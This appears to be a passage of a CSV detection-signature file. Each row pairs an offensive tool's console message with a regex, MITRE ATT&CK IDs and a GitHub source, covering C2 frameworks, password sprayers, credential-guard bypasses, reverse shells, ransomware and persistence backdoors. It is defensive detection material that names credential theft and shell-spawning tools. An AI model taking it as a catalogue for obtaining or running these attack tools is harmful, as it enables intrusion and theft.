"*[!] Starting gServer *",".{0,1000}\[!\]\sStarting\sgServer\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12960"
"*[!] Stealing processes delayed with *",".{0,1000}\[!\]\sStealing\sprocesses\sdelayed\swith\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12961"
"*[!] Success, spawning a system shell!*",".{0,1000}\[!\]\sSuccess,\sspawning\sa\ssystem\sshell!.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12962"
"*[!] Swithed to custom stealing. *",".{0,1000}\[!\]\sSwithed\sto\scustom\sstealing\.\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12963"
"*[!] The exfiltration modules does not use FireProx*",".{0,1000}\[!\]\sThe\sexfiltration\smodules\sdoes\snot\suse\sFireProx.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12964"
"*[!] The password * will be sprayed on targeted user accounts having*",".{0,1000}\[!\]\sThe\spassword\s.{0,1000}\swill\sbe\ssprayed\son\stargeted\suser\saccounts\shaving.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#content","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","12965"
"*[!] There are no enterprise CAs and therefore no one can request certificates*",".{0,1000}\[!\]\sThere\sare\sno\senterprise\sCAs\sand\stherefore\sno\sone\scan\srequest\scertificates.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12966"
"*[!] There are no enterprise CAs and therefore no one can request certificates*",".{0,1000}\[!\]\sThere\sare\sno\senterprise\sCAs\sand\stherefore\sno\sone\scan\srequest\scertificates.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12967"
"*[!] This application can not be injected*",".{0,1000}\[!\]\sThis\sapplication\scan\snot\sbe\sinjected.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12968"
"*[!] This may take more time to bruteforce *",".{0,1000}\[!\]\sThis\smay\stake\smore\stime\sto\sbruteforce\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","12969"
"*[!] Unable to read PEB address!*",".{0,1000}\[!\]\sUnable\sto\sread\sPEB\saddress!.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#content","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","12970"
"*[!] Unhandled ShadowSpray.Kerb exception:*",".{0,1000}\[!\]\sUnhandled\sShadowSpray\.Kerb\sexception\:.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","12971"
"*[!] Unhandled SharpDoor exception*",".{0,1000}\[!\]\sUnhandled\sSharpDoor\sexception.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","#content","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","12972"
"*[!] Valid login* expired password: *",".{0,1000}\[!\]\sValid\slogin.{0,1000}\sexpired\spassword\:\s.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#content","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","12973"
"*[!] Welcom to the Aoyama C&C Server*",".{0,1000}\[!\]\sWelcom\sto\sthe\sAoyama\sC\&C\sServer.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#content","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","12974"
"*[!] You are running TeamFiltration without a config*",".{0,1000}\[!\]\sYou\sare\srunning\sTeamFiltration\swithout\sa\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12975"
"*[!] You have DCs with RC4 or DES allowed for Kerberos!!!*",".{0,1000}\[!\]\sYou\shave\sDCs\swith\sRC4\sor\sDES\sallowed\sfor\sKerberos!!!.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","#content","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","12976"
"*[!][!][!] Checking Directories [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sDirectories\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12977"
"*[!][!][!] Checking drivers [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sdrivers\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12978"
"*[!][!][!] Checking modules loaded in your current process [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\smodules\sloaded\sin\syour\scurrent\sprocess\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12979"
"*[!][!][!] Checking Services [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sServices\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12980"
"*[!][!][!] EDR Checks Complete [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sEDR\sChecks\sComplete\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12981"
"*[!][!][!] Welcome to SharpEDRChecker by @PwnDexter [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sWelcome\sto\sSharpEDRChecker\sby\s\@PwnDexter\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12982"
"*[#] [HELL HALL] Press <Enter> To QUIT ... *",".{0,1000}\[\#\]\s\[HELL\sHALL\]\sPress\s\<Enter\>\sTo\sQUIT\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","12983"
"*[#] Checking file against AMSI Trigger*",".{0,1000}\[\#\]\sChecking\sfile\sagainst\sAMSI\sTrigger.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","12984"
"*[#] Ready For ETW Patch.*",".{0,1000}\[\#\]\sReady\sFor\sETW\sPatch\..{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","12985"
"*[#] Shellcode located at address *",".{0,1000}\[\#\]\sShellcode\slocated\sat\saddress\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12986"
"*[*] Appending access tokens to access_tokens.txt*",".{0,1000}\[.{0,1000}\]\sAppending\saccess\stokens\sto\saccess_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","12987"
"*[*] Checking access to mailboxes for each email address?*",".{0,1000}\[.{0,1000}\]\sChecking\saccess\sto\smailboxes\sfor\seach\semail\saddress\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","12988"
"*[*] Downloading the legitimate GPO from SYSVOL*",".{0,1000}\[.{0,1000}\]\sDownloading\sthe\slegitimate\sGPO\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12989"
"*[*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\[.{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12990"
"*[*] Overall compromised accounts: *",".{0,1000}\[.{0,1000}\]\sOverall\scompromised\saccounts\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","12991"
"*[*] Smuggling in HTML*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sHTML.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","12992"
"*[*] Smuggling in SVG*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sSVG.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","12993"
"*[*] Starting full encryption in 5s*",".{0,1000}\[.{0,1000}\]\sStarting\sfull\sencryption\sin\s5s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","12994"
"*[*] Updating downloaded GPO version number to ensure automatic GPO application*",".{0,1000}\[.{0,1000}\]\sUpdating\sdownloaded\sGPO\sversion\snumber\sto\sensure\sautomatic\sGPO\sapplication.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12995"
"*[-] * does not have Service Control Manager write privilege on *",".{0,1000}\[\-\]\s.{0,1000}\sdoes\snot\shave\sService\sControl\sManager\swrite\sprivilege\son\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","#content","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","12996"
"*[-] Account to kerberoast does not exist!*",".{0,1000}\[\-\]\sAccount\sto\skerberoast\sdoes\snot\sexist!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#content","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","12997"
"*[-] COM Hijacking failed!*",".{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","12998"
"*[-] Couldn't change memory protection from RW to RX*",".{0,1000}\[\-\]\sCouldn\'t\schange\smemory\sprotection\sfrom\sRW\sto\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","12999"
"*[-] Couldn't copy dll buffer*",".{0,1000}\[\-\]\sCouldn\'t\scopy\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13000"
"*[-] Couldn't find KaynLoader*",".{0,1000}\[\-\]\sCouldn\'t\sfind\sKaynLoader.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13001"
"*[-] Domain switch not provided. Enumerating the Domain Name*",".{0,1000}\[\-\]\sDomain\sswitch\snot\sprovided\.\sEnumerating\sthe\sDomain\sName.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#content","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","13002"
"*[-] Dropping DLL failed!*",".{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13003"
"*[-] Elevating * with DCSync privileges failed*",".{0,1000}\[\-\]\sElevating\s.{0,1000}\swith\sDCSync\sprivileges\sfailed.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#content","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","13004"
"*[-] Error authenticating to Empire's RESTful API server*",".{0,1000}\[\-\]\sError\sauthenticating\sto\sEmpire\'s\sRESTful\sAPI\sserver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13005"
"*[-] Exploit failed! *",".{0,1000}\[\-\]\sExploit\sfailed!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#content","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","13006"
"*[-] Failed to create sudoers backdoor for user *",".{0,1000}\[\-\]\sFailed\sto\screate\ssudoers\sbackdoor\sfor\suser\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13007"
"*[-] Failed to decrypt TGT using supplied password/hash. If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected*",".{0,1000}\[\-\]\sFailed\sto\sdecrypt\sTGT\susing\ssupplied\spassword\/hash\.\sIf\sthis\sTGT\swas\srequested\swith\sno\spreauth\sthen\sthe\spassword\ssupplied\smay\sbe\sincorrect\sor\sthe\sdata\swas\sencrypted\swith\sa\sdifferent\stype\sof\sencryption\sthan\sexpected.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13008"
"*[-] Failed to delete Performance DLL*",".{0,1000}\[\-\]\sFailed\sto\sdelete\sPerformance\sDLL.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","13009"
"*[-] Failed to ReadProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13010"
"*[-] Failed to ReadProcessMemory for g_IsCredGuardEnabled*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13011"
"*[-] failed to spawn shell: %s*",".{0,1000}\[\-\]\sfailed\sto\sspawn\sshell\:\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#content","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13012"
"*[-] Failed to start reverse shell*",".{0,1000}\[\-\]\sFailed\sto\sstart\sreverse\sshell.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","13013"
"*[-] Failed to WriteProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13014"
"*[-] Failed to WriteProcessMemory for g_IsCredGuardEnabled.*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_IsCredGuardEnabled\..{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13015"
"*[-] Got error 'LDAP_INSUFFICIENT_ACCESS' when trying to add new KeyCredential*",".{0,1000}\[\-\]\sGot\serror\s\'LDAP_INSUFFICIENT_ACCESS\'\swhen\strying\sto\sadd\snew\sKeyCredential.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13016"
